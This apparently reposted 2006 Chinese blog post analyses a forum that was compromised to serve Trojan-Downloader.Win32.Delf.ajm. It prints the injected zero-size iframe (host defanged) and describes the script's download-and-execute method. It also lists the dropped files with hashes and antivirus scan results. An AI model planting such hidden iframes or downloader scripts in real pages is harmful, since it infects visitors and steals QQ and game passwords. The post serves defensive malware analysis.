某论坛被加入下载Trojan-Downloader.Win32.Delf.ajm的代码
来源:互联网 发布:数据库需求分析 编辑:程序博客网 时间:2024/04/29 05:07
endurer 原创
2006-12-15 第1版
论坛首被加入代码:
/--------
<iframe src=hxxp://www.z*z***yqr.com.**/lpf/wm.htm width=0 height=0 frameborder=0></iframe>
--------/
wm.htm 的内容为JavaScript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 /mc/game/lpf.exe,保存为 c:/boot.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
lpf.exe 采用 Borland Delphi Setup Module 制作
/-------
文件说明符 : D:/virus/lpf.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2006-12-15 20:52:52
修改时间 : 2006-12-15 20:52:54
访问时间 : 2006-12-15 0:0:0
大小 : 15872 字节 15.512 KB
MD5 : 1914ec3e09f9bca86a10034ff9b3b985
-------/
Kaspersky报为 Trojan-Downloader.Win32.Delf.ajm,瑞星报为Trojan.DL.Multi.wen。
STATUS: FINISHED
Complete scanning result of "lpf.exe", received in VirusTotal at 12.15.2006, 14:28:30 (CET).
Antivirus Version Update Result
AntiVir 7.3.0.15 12.15.2006 TR/Delphi.Downloader.Gen Authentium 4.93.8 12.14.2006 Possibly a new variant of W32/SecRisk-ProcessPatcher-Sml-based!Maximus Avast 4.7.892.0 12.15.2006 no virus found AVG 386 12.15.2006 no virus found BitDefender 7.2 12.15.2006 BehavesLike:Win32.ExplorerHijack CAT-QuickHeal 8.00 12.14.2006 TrojanDownloader.Delf.ajm ClamAV devel-20060426 12.15.2006 Trojan.Downloader-51 DrWeb 4.33 12.15.2006 Trojan.DownLoader.14624 eSafe 7.0.14.0 12.14.2006 no virus found eTrust-InoculateIT 23.73.86 12.15.2006 no virus found eTrust-Vet 30.3.3252 12.15.2006 no virus found Ewido 4.0 12.15.2006 Downloader.Delf.ajm Fortinet 2.82.0.0 12.15.2006 no virus found F-Prot 3.16f 12.14.2006 Possibly a new variant of W32/SecRisk-ProcessPatcher-Sml-based!Maximus F-Prot4 4.2.1.29 12.14.2006 W32/SecRisk-ProcessPatcher-Sml-based!Maximus Ikarus T3.1.0.26 12.15.2006 no virus found Kaspersky 4.0.2.24 12.15.2006 Trojan-Downloader.Win32.Delf.ajm McAfee 4919 12.14.2006 Generic Delphi Microsoft 1.1804 12.15.2006 no virus found NOD32v2 1923 12.15.2006 probably a variant of Win32/TrojanDownloader.Delf.NDQ Norman 5.80.02 12.15.2006 W32/Delf.TWZ Panda 9.0.0.4 12.15.2006 Suspicious file Prevx1 V2 12.15.2006 no virus found Sophos 4.12.0 12.14.2006 no virus found Sunbelt 2.2.907.0 11.30.2006 no virus found TheHacker 6.0.3.132 12.14.2006 no virus found UNA 1.83 12.14.2006 no virus found VBA32 3.11.1 12.14.2006 no virus found VirusBuster 4.3.19:9 12.14.2006 no virus foundAditional Information
File size: 15872 bytes
MD5: 1914ec3e09f9bca86a10034ff9b3b985
SHA1: ad95735b4cb4ed24767801f3b3bde4823cd24281
lpf.exe会下载下列文件:
1)/mc/bao/lipengfei.exe
采用 UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo 加壳
/-------
文件说明符 : D:/virus/lipengfei.exe
属性 : A---
获取文件版本信息大小失败!创建时间 : 2006-12-15 21:2:56
修改时间 : 2006-12-15 21:2:58
访问时间 : 2006-12-15 0:0:0
大小 : 39069 字节 38.157 KB
MD5 : 8a91fe8298abe6d136e6e4a2071abb1e
-------/
瑞星报为:Trojan.PSW.QQPass.qxf
Complete scanning result of "lipengfei.exe", received in VirusTotal at 12.15.2006, 14:39:16 (CET).
Antivirus Version Update Result
AntiVir 7.3.0.15 12.15.2006 DR/Delphi.Gen Authentium 4.93.8 12.14.2006 no virus found Avast 4.7.892.0 12.15.2006 Win32:QQPass-EU AVG 386 12.15.2006 PSW.Generic2.SUE BitDefender 7.2 12.15.2006 Generic.PWStealer.A771A4B9 CAT-QuickHeal 8.00 12.14.2006 no virus found ClamAV devel-20060426 12.15.2006 no virus found DrWeb 4.33 12.15.2006 Trojan.PWS.Qqpass.326 eSafe 7.0.14.0 12.14.2006 suspicious Trojan/Worm eTrust-InoculateIT 23.73.86 12.15.2006 Win32/QQPass.Variant!Trojan eTrust-Vet 30.3.3252 12.15.2006 no virus found Ewido 4.0 12.15.2006 Trojan.QQPass.ra Fortinet 2.82.0.0 12.15.2006 no virus found F-Prot 3.16f 12.14.2006 no virus found F-Prot4 4.2.1.29 12.14.2006 no virus found Ikarus T3.1.0.26 12.15.2006 Trojan-PSW.Win32.Delf.IC Kaspersky 4.0.2.24 12.15.2006 Trojan-PSW.Win32.QQPass.ra McAfee 4919 12.14.2006 PWS-Hook.dll Microsoft 1.1804 12.15.2006 no virus found NOD32v2 1923 12.15.2006 probably a variant of Win32/PSW.QQShou.EP Norman 5.80.02 12.15.2006 W32/QQPass.CHM Panda 9.0.0.4 12.15.2006 Suspicious file Prevx1 V2 12.15.2006 no virus found Sophos 4.12.0 12.14.2006 no virus found Sunbelt 2.2.907.0 11.30.2006 no virus found TheHacker 6.0.3.132 12.14.2006 Trojan/PSW.QQPass.ra UNA 1.83 12.14.2006 Trojan.PSW.Win32.QQPass.6EDE VBA32 3.11.1 12.14.2006 BackDoor.Pigeon.516 VirusBuster 4.3.19:9 12.14.2006 no virus foundAditional Information
File size: 39069 bytes
MD5: 8a91fe8298abe6d136e6e4a2071abb1e
SHA1: 6909040f888c037999d64a32f5ef90521602ab93
packers: UPX
2)/mc/pqpq.exe
采用nSPack 1.3 -> North Star/Liu Xing Ping 加壳
/-------
文件说明符 : D:/pe/virus/pqpq.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 0.00.0195
说明 :
版权 :
备注 :
产品版本 : 0.00.0195
产品名称 : Xcd
公司名称 : Xcd
合法商标 :
内部名称 : 23oigj
源文件名 : 23oigj.exe
创建时间 : 2006-12-15 21:3:12
修改时间 : 2006-12-15 21:3:14
访问时间 : 2006-12-15 0:0:0
大小 : 44151 字节 43.119 KB
MD5 : 04433d91f101e7c95d5d77c1cbe1efd6
-------/
瑞星报为:Trojan.PSW.Misc.kif
Complete scanning result of "pqpq.exe", received in VirusTotal at 12.15.2006, 14:47:23 (CET).
Antivirus Version Update Result
AntiVir 7.3.0.15 12.15.2006 TR/PSW.Lmir.44151 Authentium 4.93.8 12.14.2006 Possibly a new variant of W32/Suspicious:VisualBasicMalware!Maximus Avast 4.7.892.0 12.15.2006 no virus found AVG 386 12.15.2006 no virus found BitDefender 7.2 12.15.2006 Generic.PWSLmir.D80E5DAD CAT-QuickHeal 8.00 12.14.2006 (Suspicious) - DNAScan ClamAV devel-20060426 12.15.2006 no virus found DrWeb 4.33 12.15.2006 BackDoor.Generic.1482 eSafe 7.0.14.0 12.14.2006 suspicious Trojan/Worm eTrust-InoculateIT 23.73.86 12.15.2006 no virus found eTrust-Vet 30.3.3252 12.15.2006 no virus found Ewido 4.0 12.15.2006 no virus found Fortinet 2.82.0.0 12.15.2006 Spy/WOWSTEAL F-Prot 3.16f 12.14.2006 Possibly a new variant of W32/Suspicious:VisualBasicMalware!Maximus F-Prot4 4.2.1.29 12.14.2006 W32/Suspicious:VisualBasicMalware!Maximus Ikarus T3.1.0.26 12.15.2006 Backdoor.Win32.PcClient.GV Kaspersky 4.0.2.24 12.15.2006 no virus found McAfee 4919 12.14.2006 no virus found Microsoft 1.1804 12.15.2006 PWS:Win32/Wowsteal.gen!A NOD32v2 1923 12.15.2006 a variant of Win32/PSW.Legendmir Norman 5.80.02 12.15.2006 no virus found Panda 9.0.0.4 12.15.2006 Suspicious file Prevx1 V2 12.15.2006 Trojan.SystemPoser Sophos 4.12.0 12.14.2006 Mal/PWS-D Sunbelt 2.2.907.0 11.30.2006 VIPRE.Suspicious TheHacker 6.0.3.132 12.14.2006 no virus found UNA 1.83 12.14.2006 no virus found VBA32 3.11.1 12.14.2006 BackDoor.Generic.1482 VirusBuster 4.3.19:9 12.14.2006 novirus:Packed/NSPackAditional Information
File size: 44151 bytes
MD5: 04433d91f101e7c95d5d77c1cbe1efd6
SHA1: 26478a8cb49411d3e87132cdad2c82993bf545f2
packers: NSPACK
packers: Packed
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=cc5f62172717
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
3)/mc/gezi.exe 未能获取
4)/mc/dabao.exe 未能获取
5)/mc/xbao.exe 未能获取
保存为C:/Program Files/Common Files下的
1.exe
2.exe
3.exe
4.exe
5.exe
与此前发现的十分相似,不过文件的MD5不同。
- 某论坛被加入下载Trojan-Downloader.Win32.Delf.ajm的代码
- 一个被加入下载木马Trojan-Downloader.Win32.Delf.ajm的网站
- 一个下载Trojan-Downloader.Win32.Delf.ajm,技术比较新奇的网页
- 某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
- 某论坛被加入下载Trojan-clicker.Win32.VB.qq的代码
- 某县政府网被加入下载木马Trojan-PSW.Win32.QQShou.ix的代码
- ARP病毒加的网址传播Trojan-Downloader.Win32.Delf.bjy
- 01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)
- 刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
- 某市发改委网站被挂马 xzz.exe/Trojan-Downloader.Win32.Delf.aof
- 木马下载器Trojan-Downloader.Win32.Small.nkb
- 某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
- 某网站挂Trojan-Downloader.SWF.Small利用flash漏洞传播Trojan-Downloader.Win32.Small
- 恢复被"Trojan-Downloader.Win32.Agent.ben"感染的exe文件
- PictureAlbum2007.zip(Trojan.Win32.Delf.ads )
- 某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
- 某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
- 某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
- stl入门
- Linux各大发行版的比较
- 366天生日密码
- BMP文件格式
- BMP文件格式分析
- 某论坛被加入下载Trojan-Downloader.Win32.Delf.ajm的代码
- IEEE-754 Floating-Point Conversion
- 学习C++的忠告
- C语言回顾
- 206_12_15炸弹人开发日志
- 学习的过程也是迭代的过程
- CMMI度量的一些关键指标
- 类和类的定义
- 2006-12-15 郁闷
